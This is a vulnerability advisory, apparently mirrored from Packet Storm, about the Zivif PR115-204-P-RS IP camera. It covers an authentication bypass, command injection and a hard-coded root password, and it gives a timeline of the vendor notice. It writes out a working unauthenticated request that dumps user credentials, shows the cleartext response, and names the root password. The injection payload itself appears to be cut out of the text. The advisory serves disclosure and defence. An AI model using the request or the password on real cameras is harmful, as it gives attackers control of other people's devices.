Lucene search

packetstormSilas CutlerPACKETSTORM:145386
HistoryDec 13, 2017 - 12:00 a.m.

Zivif PR115-204-P-RS Bypass / Command Injection / Hardcoded Password

Silas Cutler

0.87 High




`Attack vector: Remote  
Authentication: None  
Researcher: Silas Cutler `p1nk` <[email protected]>  
Release date: December 10, 2017  
Full Disclosure: 90 days  
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107  
Vulnerable Device: Zivif PR115-204-P-RS  
Version: V2.3.4.2103  
1 September 2017: Initial alerting to Zivif  
1 September 2017: Zivif contact established.  
3 September 2017: Details provided.  
7 September 2017: Confirmation of vulnerabilities from Zivif  
5 December 2017: Public note on Social Media CVE-2017-17105,  
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.  
10 December 2017: This email  
Implementation of access controls is Zivif cameras is severely lacking.  
As a result, CGI functions can be called directly, bypassing  
authentication checks.  
This was first identified with the following request (CVE-2017-17106)  
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser  
Cameras respond to this with:  
var name0="admin"; var password0="admin"; var authLevel0="255"; var  
name1="guest"; var password1="guest"; var authLevel1="3"; var  
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";  
var password3=""; var authLevel3="3"; var name4=""; var password4="";  
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";  
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var  
password7=""; var authLevel7="3"; var name8=""; var password8=""; var  
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0  
Credentials are returned in cleartext to the requester.  
In exploring, unauthenticated remote command injection is possible using  
Command results are not returned, however are executed by the system.  
One last findings was the /etc/passwd file contains the following  
hard-coded entry (CVE-2017-17107):  
The encrypted password is cat1029.  
(none) login: root  
Login incorrect  
(none) login: root  
Welcome to SONIX.  
Because of the way the file system is structured, changing this password  
requires more work then running passwd.  
The hi3510 is shared with a couple other cameras I'm exploring. The  
motd saying /Welcome to SONIX/ has lead me to speculate parts of this  
firmware may be shared with other cameras.  